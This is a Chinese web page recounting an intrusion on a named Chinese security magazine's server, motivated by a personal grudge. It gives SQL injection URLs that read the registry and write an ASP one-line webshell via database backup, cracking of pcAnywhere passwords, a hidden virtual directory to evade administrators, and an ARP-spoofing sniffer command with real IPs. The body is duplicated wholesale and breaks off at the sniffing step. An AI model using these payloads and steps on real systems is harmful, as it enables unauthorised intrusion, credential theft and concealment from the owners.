您的位置:建站学院首页 >> 文章 >> 服务器 >> 安全漏洞
黑客防线——主机外部的危险
前言:不是我有意想搞你,而是你们有些过分了,拿着别人的稿子去卖钱,拿着别人的技术装点自己,这也无所谓。你们那种优越感让我不得不提醒你们一下,你们的优越是建立在别人付出之上的。
一、扫描,发现开着ftp。。。。。没常见漏洞。。。。。决定arp欺骗,进行嗅探。
二、找嗅探主机:
C:\>ping hacker.com.cn
Pinging hacker.com.cn [211.157.102.239] with 32 bytes of data:
开始扫描 211.157.102.1-211.157.102.255 80+1433 端口,找到一个默认目录的站,然后找注入漏洞。
http://xx.xx.xx.xx/111.asp?id=3400 and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))
发现不是sa权限:
http://xx.xx.xx.xx/111.asp?id=3400 and 1=(select name from master.dbo.sysdatabases where dbid=7)
得到库名ku1:
来吧,想办法搞个shell(此处黑夜兄弟和臭要饭的兄弟提供了资料),不理解的,多看看网上资料:
http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[xiaolu] ([xiaoxue][char](255));--
http://xx.xx.xx.xx/111.asp?id=3400;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into xiaolu (xiaoxue) values(@result);--
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 xiaoxue from xiaolu)=1
得到了web路径d:\xxxx,接下来:
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--
http://xx.xx.xx.xx/111.asp?id=3400;insert into cmd(str) values ('<%if request("a")<>"" then execute request("a")%>');--
http://xx.xx.xx.xx/111.asp?id=3400;backup database ku1 to disk='D:\xxxx\l.asp';--
(关于这种shell的利用,请参见最小的asp后门的动画http://666w.cn/down/view.asp?id=754)
上传..............shell,准备提升权限......,发现pcanywhere,找到:
C:/documents and Settings/All Users/Application Data/Symantec/pcAnywhere/PCA.xxx.CIF
流光破解密码,pcanywhere连接,看来上天比较帮助我,一切顺利,admin密码和pcanywhere密码一样,:),tracert 一下:
1 <10 ms <10 ms <10 ms 211.157.102.239
唉,该当黑防有此劫,可以进行arp欺骗。(关于arp欺骗,参见我在2003-3月写的一个文章http://bbs.666w.cn/dispbbs.asp?boardID=7&ID=764&page=1)
用webshell上传我们需要的软件:
WinPcap.exe arpsniffer.exe pv.exe
arpsniffer.exe ------------ 57 k 榕哥的交换环境下嗅探工具
pv.exe ----------------60k (PrcView附带的一个命令行程序,华军有下)杀进程
WinPcap.exe ------------------678k 嗅探所用到的一个驱动程序
安装WinPcap.exe,下一步,下一步,完成。
建立一个隐藏的虚拟目录(怎么建立自己去查资料), 应用程序保护设为低 以便于我们用webshell运行arp程序,不然被管理员发现可就不好。
三、开始嗅探:
OK,继续........开始SNIFFER........由于目前中国网络结构和相关技术人员素质等问题.这个可以说是百发百中,运行:
arpsniffer.exe 211.157.102.254 211.157.102.239 21 c:\111.txt 1
211.157.102.254是网关,211.157.102.239是黑防ip,c:\111.txt是log文件,1是网卡id
一、扫描,发现开着ftp。。。。。没常见漏洞。。。。。决定arp欺骗,进行嗅探。
二、找嗅探主机:
C:\>ping hacker.com.cn
Pinging hacker.com.cn [211.157.102.239] with 32 bytes of data:
开始扫描 211.157.102.1-211.157.102.255 80+1433 端口,找到一个默认目录的站,然后找注入漏洞。
http://xx.xx.xx.xx/111.asp?id=3400 and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))
发现不是sa权限:
http://xx.xx.xx.xx/111.asp?id=3400 and 1=(select name from master.dbo.sysdatabases where dbid=7)
得到库名ku1:
来吧,想办法搞个shell(此处黑夜兄弟和臭要饭的兄弟提供了资料),不理解的,多看看网上资料:
http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[xiaolu] ([xiaoxue][char](255));--
http://xx.xx.xx.xx/111.asp?id=3400;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into xiaolu (xiaoxue) values(@result);--
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 xiaoxue from xiaolu)=1
得到了web路径d:\xxxx,接下来:
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--
http://xx.xx.xx.xx/111.asp?id=3400;insert into cmd(str) values ('<%if request("a")<>"" then execute request("a")%>');--
http://xx.xx.xx.xx/111.asp?id=3400;backup database ku1 to disk='D:\xxxx\l.asp';--
(关于这种shell的利用,请参见最小的asp后门的动画http://666w.cn/down/view.asp?id=754)
上传..............shell,准备提升权限......,发现pcanywhere,找到:
C:/documents and Settings/All Users/Application Data/Symantec/pcAnywhere/PCA.xxx.CIF
流光破解密码,pcanywhere连接,看来上天比较帮助我,一切顺利,admin密码和pcanywhere密码一样,:),tracert 一下:
1 <10 ms <10 ms <10 ms 211.157.102.239
唉,该当黑防有此劫,可以进行arp欺骗。(关于arp欺骗,参见我在2003-3月写的一个文章http://bbs.666w.cn/dispbbs.asp?boardID=7&ID=764&page=1)
用webshell上传我们需要的软件:
WinPcap.exe arpsniffer.exe pv.exe
arpsniffer.exe ------------ 57 k 榕哥的交换环境下嗅探工具
pv.exe ----------------60k (PrcView附带的一个命令行程序,华军有下)杀进程
WinPcap.exe ------------------678k 嗅探所用到的一个驱动程序
安装WinPcap.exe,下一步,下一步,完成。
建立一个隐藏的虚拟目录(怎么建立自己去查资料), 应用程序保护设为低 以便于我们用webshell运行arp程序,不然被管理员发现可就不好。
三、开始嗅探:
OK,继续........开始SNIFFER........由于目前中国网络结构和相关技术人员素质等问题.这个可以说是百发百中,运行:
arpsniffer.exe 211.157.102.254 211.157.102.239 21 c:\111.txt 1
211.157.102.254是网关,211.157.102.239是黑防ip,c:\111.txt是log文件,1是网卡id